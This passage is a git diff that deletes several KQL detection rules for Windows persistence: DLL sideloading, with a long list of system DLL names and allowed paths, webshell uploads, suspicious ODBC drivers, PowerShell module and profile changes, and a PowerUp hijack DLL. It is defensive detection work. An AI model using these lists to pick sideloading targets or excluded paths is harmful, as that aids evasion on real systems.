Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/09 -// Level: medium -// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder. -// Tags: attack.persistence -DeviceFileEvents -| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll") \ No newline at end of file diff --git a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql deleted file mode 100644 index 1884165c..00000000 --- a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/14 -// Level: high -// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql deleted file mode 100644 index 224f54fb..00000000 --- a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/13 -// Level: medium -// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll"))) \ No newline at end of file diff --git a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql b/Persistence/Potential_Webshell_Creation_On_Static_Website.kql deleted file mode 100644 index 77f667ad..00000000 --- a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo -// Date: 2019/10/22 -// Level: medium -// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. -// Tags: attack.persistence, attack.t1505.003 -DeviceFileEvents -| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql b/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql deleted file mode 100644 index 3ba6f4bf..00000000 --- a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/23 -// Level: high -// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location -// Tags: attack.persistence, attack.t1003 -DeviceRegistryEvents -| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup") \ No newline at end of file diff --git a/Persistence/PowerShell_Module_File_Created.kql b/Persistence/PowerShell_Module_File_Created.kql deleted file mode 100644 index f5d07da1..00000000 --- a/Persistence/PowerShell_Module_File_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/09 -// Level: low -// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. -// Tags: attack.persistence -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") \ No newline at end of file diff --git a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql b/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql deleted file mode 100644 index 089c2a85..00000000 --- a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/09 -// Level: medium -// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process -// Tags: attack.persistence -DeviceFileEvents -| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"))) \ No newline at end of file diff --git a/Persistence/PowerShell_Profile_Modification.kql b/Persistence/PowerShell_Profile_Modification.kql deleted file mode 100644 index cfccee4d..00000000 --- a/Persistence/PowerShell_Profile_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/24 -// Level: medium -// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013 -DeviceFileEvents -| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1" \ No newline at end of file diff --git a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql b/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql deleted file mode 100644 index 0ba4babc..00000000 --- a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/05/09 -// Level: low -// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. -// Tags: attack.persistence -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/Persistence/Powerup_Write_Hijack_DLL.kql b/Persistence/Powerup_Write_Hijack_DLL.kql deleted file mode 100644 index b2cd19b0..00000000 --- a/Persistence/Powerup_Write_Hijack_DLL.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Subhash Popuri (@pbssubhash) -// Date: 2021/08/21 -// Level: high -// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. -In it's default mode, it builds a self deleting .bat file which executes malicious command. -The detection rule relies on creation of the malicious bat file (debug.bat by default). - -// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat" \ No newline at end of file diff --git a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql deleted file mode 100644 index db3f32f1..00000000 --- a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2023/05/05 -// Level: high 